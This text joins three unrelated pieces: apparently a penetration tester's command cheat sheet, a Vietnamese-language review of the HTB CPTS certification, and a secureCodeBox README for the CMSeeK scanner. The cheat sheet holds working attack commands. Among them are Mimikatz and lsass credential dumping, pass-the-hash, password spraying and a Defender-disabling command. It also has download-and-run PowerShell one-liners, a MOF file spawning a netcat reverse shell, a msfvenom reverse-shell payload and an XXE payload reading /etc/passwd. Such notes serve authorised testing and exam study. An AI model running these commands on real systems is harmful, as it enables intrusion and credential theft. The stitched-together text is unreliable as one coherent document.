`([System.DirectoryServices.ActiveDirectory.Forest]::Getcurrentforest()).GlobalCatalogs`
- User Enumeration
https://github.com/sensepost/UserEnum
- User Enumeration using Impacket:
`# lookupsid.py domain.local/username:password@<dc-ip>`
- Return all GPOs that modify local group memberships through Restricted Groups or Group Policy Preferences. (Using PowerUp)
`Get-DomainGPOLocalGroup`
- Enumerate the machines where a specific domain user/group is a member of a specific local group. (Using PowerUp)
`powershell Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators`
- Find domain machines were specific users are logged into. (Using PowerUp)
`Find-DomainUserLocation`
- Query Session information of a remote (or local) computer. (Using PowerUp)
`Get-NetSession -ComputerName dc1`
- krbtgt Account: If the krbtgt was created with Windows 2000, the chance is its pw is user provided and can be cracked (pwdLastSet should be before ~2003/4?)
- Python port of PowerView (Pywerview): https://github.com/the-useless-one/pywerview
### Network
- run wireshark, save dump --> `./Pcredz -f dump.pcap`
or: `sudo ./net-creds.py -p dump.pcap`
### MySQL command line
- using found credentials:
` mysql -uroot -p<pass> -e 'show databases;'`
## crackmapexec
- "hash spraying" (in this case with local administrator)
`cme smb 172.16.1.0/24 -u Administrator -H 7facdc498ed1680c4fd1448319a8c04f --local-auth`
- Share enumeration with credentials:
`cme smb 172.16.1.0/24 -u bill -p 'password' --shares`
- Test if user and password combination of domain user are correct:
`crackmapexec smb domain.local -d DOMAIN -u username -p password`
- CME using Kerberos: (Requires FQDN in request to be the same as in the krb ticket!)
```
$ export KRB5CCNAME=/home/testuser/impacket/administrator.ccache
$ cme smb zoro.gold.local --use-kcache
```
## Password Spraying
- Using Kerbrute:
`# ./kerbrute_linux_amd64 passwordspray --dc 10.10.10.1 -d example.net userlist.txt 'F00B@r23!'`
- Check username with username as password:
`# ./kerbrute_linux_amd64 passwordspray --dc <dcip> -d domain.local adusers.txt --user-as-pass `
- PowerShell script: https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1
### Analysis in BloodHound
1. Store all users to a textfile owned_users.txt
2. Add a flag to all these users in the Neo4j DB that could be sprayed successfully using BloodHoundLoader (https://git.compass-security.com/csnc/tools2go/blob/master/stable/bloodhound/BloodHoundLoader.py):
`# ./stable_bloodhound_BloodHoundLoader.py -o "pwspray='pw1'" owned_users.txt`
4. Because you own the password of these users, you can also mark them as owned in BloodHound:
`# ./stable_bloodhound_BloodHoundLoader.py -m o owned_users.txt`
5. Use the following Cypher query to get the users and their local admin count (adjust the added flag, e.g. u.pwspray = "pw1"):
```
MATCH (u:User) WHERE u.pwspray = "pw1"
OPTIONAL MATCH (u)-[:AdminTo]->(c1:Computer)
OPTIONAL MATCH (u)-[:MemberOf*1..]->(:Group)-[:AdminTo]->(c2:Computer)
WITH u, COLLECT(c1) + COLLECT(c2) AS tempComputers UNWIND tempComputers AS computers
RETURN u.name, COUNT(DISTINCT(computers))
ORDER BY COUNT(DISTINCT(computers)) DESC
```
## ASRepRoasting
- using impacket:
`# python3 GetNPUsers.py <domainname>/ -usersfile /root/Desktop/adusers.txt -dc-ip <dcip>`
## File Transfer
### PowerShell File Download
- `Invoke-RestMethod -Uri $uri -Method Post -InFile $uploadPath -UseDefaultCredentials`
- `IEX ((New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1"))`
- `powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"`
### Download base64 encoded file
- `[System.IO.File]::WriteAllBytes("c:\windows\temp\telem.exe",[System.Convert]::FromBase64String((New-Object Net.Webclient).downloadstring("https://XOURDOMAIN.COM")))`
### netcat
- transfer files from kali to windows:
1. open listener on target: `nc -nlvp 4444 > incoming.exe`
2. send file to target: `nc -nv 10.0.0.22 4444 < /usr/share/windows-binaries/wget.exe`
- transfer files from windows to kali:
1. on Kali: `nc -nlvp 4444 > file.txt`
2. on Windows: `nc.exe -10.11.0.90 4444 < c:\users\bla\file.txt`
### Impacket
- connect smbclient.py with hash:
`/usr/share/doc/python3-impacket/examples/smbclient.py -hashes :175a592f3b0c0c5f02fad40c51412d3a Administrator@10.11.1.202`
- get shares: `shares`
- upload something to c$:
`use C$`
`put /var/www/html/transfer/nc.exe`
### Download with SCP
- when having SSH key to remote target, download file with:
`scp -i mysshprivatekey user@10.10.10.10:/home/myuser/filename /home/folder/targetfilename`
- From Windows using Putty: (using user root on the target vm "kali" to download the file /tmp/file.bin to the current dir on Windows)
`pscp root@kali:/tmp/file.bin .`
### Upload
`# scp -r localfolder/ user@remotehost:/targetdir/`
Single file:
`$ scp -i /home/kali/.ssh/id_rsa /home/kali/Desktop/urls.txt username@server.domain.com:/home/username/urls.txt`
- On Windows using Putty:
`C:\Payloads>pscp beacon-http.bin root@kali:/tmp/beacon.bin`
### SSH copy
- file: `scp -p 192.168.1.100:/root/filetocopy targetfile`
- directory: `scp -r root@192.168.1.100:/var/log ~/backup-logs`
### Others
- `smbget -R smb://1.1.1.1/folder`
- LOLBins Windows: https://lolbas-project.github.io/
- LOLBins Linux: https://gtfobins.github.io/
- Updog (https://github.com/sc0tfree/updog) --> `updog -d /tmp/www/ -p 443 --password SuperS3cr3t --ssl`
- goshs (https://github.com/patrickhener/goshs) --> supports user provided certs
## PrivEsc Windows
- https://github.com/itm4n/PrivescCheck
- missing patches:
https://github.com/rasta-mouse/Sherlock
https://github.com/rasta-mouse/Watson
- One liner for privesccheck:
`[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1');Invoke-PrivescCheck -Extended -Report prvcheckreport -Format HTML,CSV`
- Add new admin:
`net user /add [username] [password]`
`net localgroup administrators [username] /add`
- `IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1")`
`Invoke-AllChecks`
- Search for passwords in ini,xml and txt files:
`findstr /si password *.xml *.ini *.txt`
- Check services:
`wmic service get name, displayname, pathname, startname`
Check insecure service permissions:
`accesschk.exe -accepteula -uwcqv "Authenticated Users" *`
- Check Privileges with: `whoami /priv`
If User has `SeImpersonate` or `SeAssignPrimaryToken` (most often service accounts!) you can get to SYSTEM by using the "potato": https://github.com/ohpe/juicy-potato
For IIS: https://www.youtube.com/watch?v=wK0r-TZR7w8&feature=emb_title
For SQL Server: https://www.youtube.com/watch?v=3CPdKMeB0UY&feature=emb_title
If you have path traversal plus a location with write access you can exploit that with a malicious MOF file:
1. Generate MOF template with msf module "exploit/windows/smb/psexec":
msf5 exploit(windows/smb/psexec) > `irb`
[ ... ] >>`puts generate_mof("Specialclass","ToOpenReverseShell")`
2. Copy it to a MOF and replace the following line
`ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"ToOpenReverseShell\");}`
with:
`ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"nc -e cmd 10.11.0.90 9001\");}`
3. Transfer the nc.exe to the targets C:\windows\system32
4. Start netcat listener on kali (same port as above in code!)
5. Transfer the MOF file:
`put filename.mof ../../../../windows/system32/wbem/mof/Specialclass.mof`
--> This will provide you with a reverse shell!
- Error "This program cannot be run in DOS mode."
When you get this error in a shell when trying to run uploaded files through FTP, try to first change the mode to binary, before you PUT the file:
`ftp> binary`
`200 Type set to I.`
`ftp> put accesschk.exe`
`[ ... ]`
`150 Opening BINARY mode data connection for accesschk.exe.`
`226 Transfer complete.`
## PrivEsc Linux
- First look for obvious fails, like:
- writable etc/passwd or exports
- readable etc/shadow. ssh keys, bash history, cronjobs
- capabilities --> `/sbin/getcap -r / 2>/dev/null`
- suid binaries --> `find / -perm -u=s -type f 2>/dev/null`
PrivEsc using suid: https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/
- editable/vulnerable service binaries
- Good tools to aid are linpeas.sh, linux-exploit-suggester.sh, LinEnum, LinuxPrivChecker, PowerUp and pspy
- ltrace: shows parameters of invoked functions and system calls.
example: `# ltrace -s 1000 ./filearchiver`
`__libc_start_main(0x80483f0, 1, 0xbfdf8a84, 0x8048440 <unfinished ...>`
`puts("Archiving files to server..."Archiving files to server...`
`) = 36`
`system("scp -r file/tobearchived/* 100.101.110.100:/var/www/html/files/"`
--> this provides us with the information, that this tool runs "scp" without path!
- Spawn bash shell with python:
`python -c 'import pty;pty.spawn("/bin/bash")'`
(if python3 --> python3 -c "import pty; pty.spawn('/bin/bash')"`
`python -c 'import pty; pty.spawn("/bin/sh")'`
make the reverse shell more usable (with autocomplete etc.):
`ctrl + z`
`stty raw -echo; fg`
## TCPDUMP
- capture traffic from specific port:
`tcpdump -s 0 port ftp or ssh -i eth0 -w mycap.pcap`
`tcpdump -s 0 port 3389 -i eth0 -w mycap.pcap`
Listen for NetBIOS, SMB, RPC:
`tcpdump -i eth0 'port 137 || 138 || 139 || 445'`
Record traffic into file and show in console at the same time:
`sudo tcpdump -i eth0 -U -w - | tee test.pcap | tcpdump -r -`
## Searching stuff
- search folder and subfolders for a string, output results and save results to file:
`grep -ria @emaildomain.com /mnt/leaks_unpacked/ | tee /root/Desktop/85390/search_emaildomain.out`
- search for string 'pass' in txt files with error redirection:
`find /home -iname "*.txt" 2>/dev/null -exec grep -i 'pass' {} \;`
- search for string in file and show n number of lines before and after the occurence of the string:
`cat <file> | grep "stringtosearch" -C 5`
- searching the home directories on linux:
`ls -ahlR /home `
- search for ip addresses in files of specified directory and subdirs:
`# grep -rnioE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /etc`
- get full path to file
`realpath key.pem`
- Comparison: get all entries of file2 with are not already in file1:
`awk 'FNR==NR{a[$0]=1;next}!($0 in a)' file1 file2`
- get all unique entries from multiple files and save them to new file:
`awk '!a[$0]++' folderwithfiles/* > uniqueentries.txt`
- find all files with specific ending (recursive) and copy them to a target directory:
`find ./ -name "*.burp" -ls -exec cp {} /mnt/hgfs/transfer/targetfolder/ \;`
`./` --> means from the current directory and subfolders
`-exec` --> with the results from the find command (being {} ), execute the following command
- Get specific lines of nmap report, e.g. systems with specific port open:
`cat TCP-SYN-scan_11-06-19_02-45-50.txt | grep -E "Nmap scan report for|445/tcp open"`
`cat nmap_SYN_scan_TCP_TOP_100.nmap | grep -E "Nmap scan report|open" | grep -B1 open`
- If number of spaces between port and status is different: (Note: there is a space between the brackets!)
`cat TCP-SYN-scan_11-06-19_04-59-05.txt | grep -E "80/tcp[ ]+open"`
- Get last two regex occurences of string, e.g. to return only "domain.topleveldomain" from a long list which includes subdomains:
`grep -E "[A-Za-z0-9\-]+\.[A-Za-z0-9\-]+$" --color -o urls.txt | sort -u`
- another method:
`cat domains.txt | rev | cut -d. -f 1-2 | rev`
- get client IPs from apache access.log and group them:
`cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn`
- Get Current user:
`grep -oz "USER=.*" /proc/self/environ; echo `
- Get current users id:
`cat /proc/self/loginuid;echo`
## Creating lists
- add domain name to the beginning of each user in a users.txt file:
`# sed -e 's/^/THINC\\/' /root/Desktop/OSCP/usernames.txt > /root/Desktop/OSCP/domainusers.txt`
## Pass-the-Hash techniques
- Dump creds with Impacket:
`secretsdump.py ralph/user1@10.11.1.31 -hashes aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f`
- open cmd.exe on remote target with known hash:
`/usr/share/doc/python-impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:175a592f3b0c0c5f02fad40c51412d3a Administrator@10.11.1.202 cmd.exe`
If psexec is not possible because of AntiVirus, try atexec (and e.g. disable defender):
`atexec.py -hashes :e481ed3ed667f5df3c3c3b0dc37ca25f9 winattacklab.local/ffast@10.0.1.100 "powershell -c Set-MpPreference -DisableRealtimeMonitoring \$true"`
- Open remote connection with known hash using wmiexec:
`wmiexec.py ralph/user1@10.11.1.31 -hashes aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f`
- connect to target with evil-winrm:
`evil-winrm -i <IP> -u <username> -H <ntlm hash>`
- CME PTH:
`cme smb 172.16.1.1 -u Administrator -H 7facdc498ed1680c4fd1448319a8c04f`
Overpass the hash with CME (using kerberos auth):
`cme smb 172.16.1.1 -u Administrator -H 7facdc498ed1680c4fd1448319a8c04f -k`
## Mimikatz
- First Mimikatz commands: (run always)
`mimikatz # privilege::debug`
`mimikatz # log sekurlsa.log`
- logonpasswords:
`mimikatz # sekurlsa::logonpasswords`
- other way:
`mimikatz # token::elevate`
`mimikatz # lsadump::secrets`
- Use minidump file:
`mimikatz # sekurlsa::minidump C:\WINDOWS\Temp\debug7962.bin`
- PW Dump oneliner: `mimikatz.exe privilege::debug sekurlsa::logonPasswords exit > output.txt`
- Start shell with NTLM hash of user:
`mimikatz # sekurlsa::pth /user:admin-kiwi /domain:comp-internal /ntlm:cc36cf7a8514893efccd332446158b1a /run:cmd`
## Extracting Credentials
- Possible attack sequence with metasploit:
1. Run Metasploit's "hashdump" to get hashes: `hashdump`
2. Start a process under the desired identity: `mimikatz sekurlsa::pth /user:Administrator /domain:. /ntlm:… /run:"powershell -w hidden"`
3. In Metasploit, abuse the security token of the just spawn process: `steal_token 1234`
4. Do now whatever you want in metasploit with these privileges (e.g. list\\target\c$, upload and run binaries, perform WMIC commands, ...)
- Create minidump: (easiest with right click in taskmgr)
`procdump64.exe -accepteula -ma lsass.exe lsass.dmp`
Remote: `psexec.py -c procdump64.exe 'example.com/username:P@ssw0rd@foobar.example.com' '-accepteula -ma lsass.exe c:\lsass.dmp'`
- On Kali, you can use pypykatz to extract the creds from the lsass.dmp:
Install pypykatz:
`# pip3 install pypykatz`
Extract the creds from the lsass.dmp:
`# pypykatz lsa minidump lsass.dmp`
- Using registry (security,sam and system)
`C:\> reg.exe save hklm\sam c:\temp\sam.save`
`C:\> reg.exe save hklm\security c:\temp\security.save`
`C:\> reg.exe save hklm\system c:\temp\system.save`
`# secretsdump.py -sam sam.save -security security.save -system system.save LOCAL`
- Using PowerShell:
`Powershell -c rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [process ID of lsass.exe] c:\temp\candies.bin full`
- Extract specific users creds from DC:
`impacket-secretsdump 'domain.local/username:password'@<DC-IP> -just-dc-user <username> -just-dc-ntlm`
- Extract creds from vmdk/vhd/vhdx files: https://github.com/CCob/Volumiser
- SCCM share (SCCMContentLib$) enumeration and credential extraction: https://github.com/1njected/CMLoot
### Python NTLM hash
```python
import hashlib,binascii
hash = hashlib.new('md4', "Somepass1".encode('utf-16le')).digest()
password = "Somepass1"
print ("Password before hash: ",password)
print ("Hashed password: ",binascii.hexlify(hash))
```
## Bypass Applocker
- Bypass Applocker with mimilib.dll to run arbitrary executables:
`rundll32 c:\path\mimilib.dll,start d:\otherpath\a.exe`
- Run PowerShell.exe via wmic.exe:
`wmic.exe process call create "cmd /c powershell"`
- Load a binary into byte array and run it from powershell:
`[byte[]]$bytes = get-content -encoding byte -path C:\Users\username\Desktop\Snaffler.exe`
`$asm = [System.Reflection.Assembly]::Load($bytes)`
`$vars = New-Object System.Collections.Generic.List[System.Object]`
`$vars.Add("-s")`
`$vars.Add("-o")`
`$vars.Add("snaffler.log")`
`$passed = [string[]]$vars.ToArray()`
`$asm.EntryPoint.Invoke($null, @(,$passed))`
## Metasploit
- Multihandler:
`msf>use exploit multi/handler`
`msf>set payload windows/meterpreter/reverse_tcp`
`msf>set lhost <local IP>`
`msf>set lport <local port>`
`msf>set ExitOnSession false`
`msf>exploit -j`
- MSF Payload:
`msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.90 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows`
- Vuln Scanning with MSF:
make sure db runs: `db_status`
`db_nmap -v -sV 10.11.1.35`
`db_nmap -sS -Pn -A 10.11.1.35`
## RDP
### Linux RDP Client
- `rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.10.10.10`
### Tunneling via RDP
On Linux:
1. git clone https://github.com/V-E-O/rdp2tcp
2. apt install mingw-w64
3. make server-mingw32
Note: You might have to change the <rdp2tcpFolder>/server/Makefile.mingw32 --> Set CC=i686-w64-mingw32-gcc-win32
4. make client
5. xfreerdp /u:<user> /p:<pw> /v:<TargetIP> /rdp2tcp:/home/kali/rdp2tcp/client/rdp2tcp
6. Transfer the ./server/rdp2tcp.exe to the windows target
7. On the Windows target, run rdp2tcp.exe as an unprivileged user
8. On Linux: configure the proxychains config ("socks5 127.0.0.1 1080" >> /etc/proxychains.conf)
9. `python2 tools/rdp2tcp.py add socks5 127.0.0.1 1080`
10. enjoy the tunnel with "proxychains .... targets"!
## start webserver
- `python -m SimpleHTTPServer 80`
- `python3 -m http.server 7331`
- `php -S 0.0.0.0:8000`
- `ruby -run -e httpd . -p 9000`
- `busybox httpd -f -p 10000`
- `updog` (Allows also file upload!)
## start FTP server
- Install pyftpdlib
`pip install pyftpdlib`
Run (-w flag allows anonymous write access)
`python -m pyftpdlib -p 21 -w`
## XXE
- Payload in office document
Locate data in the Excel / Word which is parsed by the web app (e.g. by opening the office document in VIM or 7zip) and insert xxe payload:
`<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>`
Wherever the value is added, replace the value with "&ent;"
## Compiling
- Compiling a C program:
`gcc -static -mpreferred-stack-boundary=2 -o Shell ShellSpawn.c`
`gcc -o Shell ShellSpawn.c`
## Buffer Overflows etc.
### Patterns
- Create a unique pattern of 2700 byte:
`/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700`
- locate a hex offset pattern:
`/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438 -l 2700`
### Badchars
- generate all possible hex chars:
`cat badchars.py`
`#!/usr/bin/python`
`import sys`
`for x in range(1,256):`
`sys.stdout.write("\\x" + '{:02x}'.format(x))`
- Badchars:
Bad characters
`badchars = (`
`"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"`
`"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"`
`"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"`
`"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"`
`"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"`
`"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"`
`"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"`
`"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"`
`"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"`
`"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"`
`"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"`
`"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"`
`"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"`
`"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"`
`"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"`
`"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )`
Generate shellcode (may need to use different encoder due to huge list of bad characters. x86/fnstenv_mov may help)
## AMSI Stuff
AMSI Test string:
`‘AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386’ `
## Misc
Create NT hash (RC4) of string using rubeus.exe:
`rubeus hash /password:<string>`
Using smbencrypt:
```bash
# smbencrypt SecureP4ss
LM Hash NT Hash
-------------------------------- --------------------------------
E41905232DC0574622EC7988C7A60073 409EE7AA969E30D8A04F05D6AB78E57C
```
Using python:
```python
import hashlib,binascii
hash = hashlib.new('md4', "SecureP4ss".encode('utf-16le')).digest()
print(binascii.hexlify(hash))
# Output: b'409ee7aa969e30d8a04f05d6ab78e57c'
```
Search Jira for Credentials: https://github.com/sahadnk72/jecretz
|
# HTB-CPTS
Most of the notes, resources and scripts I used to prepare for the HTB CPTS and "pass it the 2 time."
## 29-05-2023
HTB Certified Penetration Testing Specialist (HTB CPTS) [Badge here!](https://www.credly.com/badges/333ada6a-c23e-422c-a34a-109436cbd41c/public_url)
Giới thiệu về nó 1 chút:
*HTB CPTS is a highly hands-on certification that assesses the candidates’ penetration testing skills. HTB Certified Penetration Testing Specialist certification holders will possess technical competency in the ethical hacking and penetration testing domains at an intermediate level. They will be able to spot security issues and identify avenues of exploitation that may not be immediately apparent from searching for CVEs or known exploit PoCs. They can also think outside the box, chain multiple vulnerabilities to showcase maximum impact, and actionably help organizations remediate vulnerabilities through commercial-grade pentesting reports.*
The Exam:
*The candidate will have to perform blackbox web, external and internal penetration testing activities against a real-world Active Directory network hosted in HTB’s infrastructure and accessible via VPN (using Pwnbox or their own local VM). Upon starting the examination process, a letter of engagement will be provided that will clearly state all engagement details, requirements, objectives, and scope. All a candidate needs to perform the required penetration testing activities is a stable internet connection and VPN software. HTB Certified Penetration Testing Specialist is the most up-to-date and applicable certification for Penetration Testers that focuses on both penetration testing and professionally communicating findings.*
Tôi copy full từ trang chủ của [Hack The Box - CPTS](https://academy.hackthebox.com/preview/certifications/htb-certified-penetration-testing-specialist/) . Tóm lại, nó giống kiểu kiểm thử 1 hệ thống từ ngoài vào trong, không có máy đơn, sâu chuỗi tấn công, leo thang đặc quyền, Double Pivoting, Active Directory attack, Domain Trust attack,... Cuối cùng là viết một báo cáo chi tiết step by step.
Tôi chọn CPTS vì nó rẻ trong [Roadmap](https://pauljerimy.com/security-certification-roadmap/)
Được rồi nói một chút cảm nhận của tôi về nó nhé. Để cho anh em ai muốn thi thì xem xét!
## Được
- Hack The Box Academy là một nền tảng dạy học offensive tốt và đặc biệt phần Active Directory. Nên tôi muốn thi để trải nghiệm và học thêm về AD. Phần PATH nó cũng cung cấp kiến thức cơ bản và cần thiết.
- Tài liệu và lab học khá ổn. Nếu anh em nào cũng chơi HTB hay THM, PG sẽ biết là cần kết nối VPN để làm lab. Còn HTB Academy có sử dụng Pwnbox, chỉ cần login vào nền tàng web của nó là làm được luôn.
- Tài liệu học giải thích chi tiết, cuối mỗi module còn có lab để thực hành.
## Hạn chế
- Khoá học cung cấp kiến thức không quá sâu
- Discord của HTB nói chỉ cần học trong lộ trình là đủ pass. Tôi thấy nó khá khó, rabit hole không cần thiết và nhiều thứ trong thi cần gg.
- Viết báo khá dài :((
- Không có giám sát, 10 ngày mà
## Xàm
Theo lý thuyết thì học và làm lab hết 43 ngày. Nhưng đó nếu ae có base tốt thì phần web sẽ học rất nhanh, chỉ có phần AD, pivot, PE windows thì hơi lâu. Tôi tốn 2,5 tháng để học xong, nhưng tôi ko thi ngay mà lên youtube xem [bmdyy](https://www.youtube.com/watch?v=dRW1Gxmu__Q&ab_channel=bmdyy) và [CryptoCat](https://www.youtube.com/watch?v=UN5fTQtlKCc&ab_channel=CryptoCat) . Thấy ô `bmdyy` offensive expert mất 5 ngày, ô còn lại thì 2 lần mới pass. Thế là tôi mới nghĩ "thi luôn chắc tạch" nên tôi đã học thêm 3 tuần và đợi đến lúc nghỉ lễ 30/4-1/5 để thi :))
Lần 1 tôi trượt, tôi nghĩ nó giống module cuối. Nhưng không, stuck máy trước sao mà sang máy sau. Thế là tôi nộp báo cáo trắng để được thi lại lần 2.
Lần 2, tôi đã ôn kỹ lại 3 module trên + bloodhound, crackmapexec. Tôi đã hoàn thành lab exam hết hơn 7 ngày và ngồi viết cái báo cáo trong 11-12h. Nộp báo cáo và có thông báo pass trong 4 ngày sau đó.
Dù sao cũng là một trải nghiệm thú vị.
Cảm ơn vì đã đọc tới đây!
## Reference link/resource
[🎙️ HTB Stories #10](https://www.youtube.com/watch?v=wwmCHeYd1I4&ab_channel=HackTheBox)
[My Guide to HTB’s CPTS Course/Exam - bmdyy](https://www.youtube.com/watch?v=dRW1Gxmu__Q&ab_channel=bmdyy)
[ HTB CPTS - Review + Tips - YouTube - CryptoCat ](https://www.youtube.com/watch?v=UN5fTQtlKCc&ab_channel=CryptoCat)
#### Tool
[Edges — BloodHound 4.3.1 documentation](https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html)
[Introduction - CrackMapExec doc )](https://wiki.porchetta.industries/)
[PowerView doc](https://powersploit.readthedocs.io/en/latest/)
#### Pivoting
[Attacking Enterprise Networks: Double Pivot using Chisel](https://forum.hackthebox.com/t/attacking-enterprise-networks-double-pivot-using-chisel/267043)
[runas - Running PowerShell as another user, and launching a script - Stack Overflow](https://stackoverflow.com/questions/28989750/running-powershell-as-another-user-and-launching-a-script)
#### 3 module
[Windows Privilege Escalation](https://academy.hackthebox.com/module/details/67)
[Active Directory Enumeration & Attacks ](https://academy.hackthebox.com/module/details/143)
[Pivoting, Tunneling, and Port Forwarding](https://academy.hackthebox.com/module/details/158)
|
---
title: "CMSeeK"
category: "scanner"
type: "CMS"
state: "released"
appVersion: "v.1.1.3"
usecase: "Automation of the process of detecting the Joomla CMS and its core vulnerabilities"
---
<!--
SPDX-FileCopyrightText: the secureCodeBox authors
SPDX-License-Identifier: Apache-2.0
-->
<!--
.: IMPORTANT! :.
--------------------------
This file is generated automatically with `helm-docs` based on the following template files:
- ./.helm-docs/templates.gotmpl (general template data for all charts)
- ./chart-folder/.helm-docs.gotmpl (chart specific template data)
Please be aware of that and apply your changes only within those template files instead of this file.
Otherwise your changes will be reverted/overwritten automatically due to the build process `./.github/workflows/helm-docs.yaml`
--------------------------
-->
<p align="center">
<a href="https://opensource.org/licenses/Apache-2.0"><img alt="License Apache-2.0" src="https://img.shields.io/badge/License-Apache%202.0-blue.svg"/></a>
<a href="https://github.com/secureCodeBox/secureCodeBox/releases/latest"><img alt="GitHub release (latest SemVer)" src="https://img.shields.io/github/v/release/secureCodeBox/secureCodeBox?sort=semver"/></a>
<a href="https://owasp.org/www-project-securecodebox/"><img alt="OWASP Lab Project" src="https://img.shields.io/badge/OWASP-Lab%20Project-yellow"/></a>
<a href="https://artifacthub.io/packages/search?repo=securecodebox"><img alt="Artifact HUB" src="https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/securecodebox"/></a>
<a href="https://github.com/secureCodeBox/secureCodeBox/"><img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/secureCodeBox/secureCodeBox?logo=GitHub"/></a>
<a href="https://twitter.com/securecodebox"><img alt="Twitter Follower" src="https://img.shields.io/twitter/follow/securecodebox?style=flat&color=blue&logo=twitter"/></a>
</p>
## What is CMSeeK?
CMSeeK is an open source penetration testing tool to automate the process of detecting various types of CMS and its installed extensions.
Only the Joomla CMS is supported by secureCodeBox. CMSeeK has a database with known vulnerabilities.
To learn more about the CMSeeK scanner itself, visit the CMSeeK GitHub repository [here](https://github.com/Tuhinshubhra/CMSeeK).
## Deployment
The cmseek chart can be deployed via helm:
```bash
# Install HelmChart (use -n to configure another namespace)
helm upgrade --install cmseek secureCodeBox/cmseek
```
## Scanner Configuration
The CMSeeK targets are specified with the `-u` parameter. The target should be a URL.
Additional CMSeeK scan features can be configured via the parameter attribute.
Some useful example parameters listed below:
- `-u URL, --url URL` : Target Url.
- `--follow-redirect` : Follows all/any redirect(s).
- `--no-redirect` : skips all redirects and tests the input target(s)
- `-r, --random-agent`: Use a random user agent.
- `--googlebot`: Use Google bot user agent.
- `--user-agent USER_AGENT`: Specify a custom user agent
## Requirements
Kubernetes: `>=v1.11.0-0`
## Values
| Key | Type | Default | Description |
|-----|------|---------|-------------|
| cascadingRules.enabled | bool | `true` | Enables or disables the installation of the default cascading rules for this scanner |
| parser.affinity | object | `{}` | Optional affinity settings that control how the parser job is scheduled (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes-using-node-affinity/) |
| parser.env | list | `[]` | Optional environment variables mapped into each parseJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) |
| parser.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images |
| parser.image.repository | string | `"docker.io/securecodebox/parser-cmseek"` | Parser image repository |
| parser.image.tag | string | defaults to the charts version | Parser image tag |
| parser.scopeLimiterAliases | object | `{}` | Optional finding aliases to be used in the scopeLimiter. |
| parser.tolerations | list | `[]` | Optional tolerations settings that control how the parser job is scheduled (see: https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/) |
| parser.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the parser will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ |
| scanner.activeDeadlineSeconds | string | `nil` | There are situations where you want to fail a scan Job after some amount of time. To do so, set activeDeadlineSeconds to define an active deadline (in seconds) when considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#job-termination-and-cleanup) |
